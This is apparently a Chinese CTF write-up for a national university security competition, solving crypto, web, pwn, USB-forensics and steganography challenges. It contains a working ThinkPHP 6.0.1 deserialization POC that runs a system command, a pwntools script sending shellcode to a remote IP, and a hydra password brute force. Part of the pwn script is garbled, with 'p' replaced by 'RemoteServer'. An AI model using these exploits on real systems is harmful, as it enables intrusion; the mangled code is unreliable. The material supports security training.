- 1利用Neo4j构建知识图谱_neo4j知识图谱
- 2Oracle中的分页查询_oracle分页查询
- 3Java防止Xss注入json_【快学springboot】15、SpringBoot过滤XSS脚本攻击
- 4uni-app简单介绍_uniapp是什么
- 5基于SpringBoot+Vue的房屋租赁系统 (源码+文档+包运行)_springboot+vue房产中介系统
- 6第七章:AI大模型的部署与维护 7.4 模型监控
- 7利用android studio制作简易的计算器_androidstudio做一个计算器使用tablelayout布局
- 8[PTA]实验11-2-1 建立学生信息链表
- 9高仿网易酷狗侧滑与QQ新界面侧滑_android 模仿酷狗(新版)滑动侧滑栏的效果
- 10yolo-mask的损失函数l包含三部分_IoU、GIoU、DIoU、CIoU损失函数的那点事儿
第十五届全国大学生信息安全竞赛创新实践能力赛_第十五届全国大学生信息安全竞赛——创新实践能力赛webezpentest
赞
踩
基于挑战码的双向认证1
这两个应该是属于非预期,查找文件内容,两个flag都出了:
find / |xargs grep -ri flag{ 2>/dev/null
flag{34f5fdaf-c373-47fd-afab-01ed2914c11a}
基于挑战码的双向认证2
解题步骤同上
基于挑战码的双向认证3
使用hydra爆破获得root密码toor。
登陆查找(find / |xargs grep -ri flag{ 2>/dev/null)获得flag
flag{7b352ef0-1bb1-41af-a7d7-b74f62ff23f0}
ISO9798
- 爆破sha256老脚本套路了
import hashlib
dic = '0123456789abcdefghijklmnopqrstuvwxyzQAZWSXEDCRFVTGBYHNUJMIKOPL'
for a in dic:
for b in dic:
for c in dic:
for d in dic:
t = str(a)+str(b)+str(c)+str(d)+'EvLOXDipk6pWH7ci'
#print(t)
sha256=hashlib.sha256(t.encode("utf8")).hexdigest()
#print(sha256)
if sha256 == 'ca0dddf277edecadf0de6f6c6c99ee2664a736ad847f8a345970a6f233eb6910':
print(t)
break
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
-
结合后面的题这个值就传0,使其rb为0
-
然后他给的是rA||rB||B加密的结果,要我们给rB||rA.,猜测是ECB模式加密。,所以直接将第一块和第二块换一下位置即可
最终得到flag,
flag{0fc5a96c-16e5-497e-955a-3e7356bd549c}
Ezpop
- 存在源码泄露,访问www.zip拿到源码,在app/controller/Index.php中发现test控制器存在一个用户可控的反序列化输入点
利用ThinKPHP6.0.1的反序列化漏洞利用链构造后成功在根目录下获取flag,POC如下
<?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $withAttr = []; protected $json = []; protected $jsonAssoc = false; function __construct($obj = ''){ $this->lazySave = True; $this->data = ['whoami' => ['cat /flag.txt']]; $this->exists = True; $this->table = $obj; $this->withAttr = ['whoami' => ['system']]; $this->json = ['whoami',['whoami']]; $this->jsonAssoc = True; } } } namespace think\model{ use think\Model; class Pivot extends Model{ } } namespace{ echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot())))); }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
flag{8c3f66f3-f3ca-4b6e-be63-9230376498fc}
login-nomal
- 其实就是一个菜单逆向题目,首先进入1之后修改flag标志,然后进入2发送可见shellcode(shellcode自己构造就行)
from RemoteServerwn imRemoteServerort * ShellCode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0RemoteServer160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8RemoteServer115l1n0J0h0a071N00" def main(): context(log_level='debug', arch='amd64', os='linux') #RemoteServer = RemoteServerrocess("./login") RemoteServer = remote("101.201.144.230", 24613) libc = ELF('./libc-2.33.so') RemoteServerayload1 = 'ORemoteServerT:1\nMSG:ro0ta\n' RemoteServerayload2 = 'ORemoteServerT:2\nMSG:'+ShellCode+"\n" RemoteServer.recvuntil(">>> ") RemoteServer.sendline(RemoteServerayload1) RemoteServer.recvuntil(">>> ") RemoteServer.sendline(RemoteServerayload2) RemoteServer.interactive() if __name__ == "__main__": main()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
flag{7d4521c1-4789-4365-8475-86cb048eeaf1}
ez_usb
- 通过wireshark打开发现存在两种usb的流量信息,通过过滤全选导出分组将其另存,过滤语法为usb.src =="2.10.1"和usb.src =="2.8.1”
- 利用UsbKeyboardDataHacker.py脚本(github上可找)对其解密获得压缩包的十六进制和压缩包的密码
- 整理压缩包的十六进制,置空<CAP>,删除<DEL>前的一个字母c,保存后解压得到flag
flag{20de17cc-d2c1-4b61-bebd-41159ed7172d}
签到
打开链接根据摩斯密码表点击三次按钮输入s启动,根据公众号的提示和密码本进行模十算法,如图
根据提示将得出的数据发包即可得到flag
flag{59727c32-14c9-4bf1-9c65-cbeae9d8a247}
问卷调查
填写问卷即可得到flag。
flag{Thanksforplayingourgames
everlasting_night
根据提示,用stegsolve进行分析,挨个查看,得到一串字符串
对其进行尝试lsb隐写解密,
查看文件内容,可以知道是加密的zip文件
在图片最后多余处,得到一串md5,MD5破解得到压缩包密码
解压得到flag的图片,用GIMP打开看到flag,但是不方便读,PS修改一下,得到flag
flag{607f41da-e849-4c0b-8867-1b3c74536cc4}
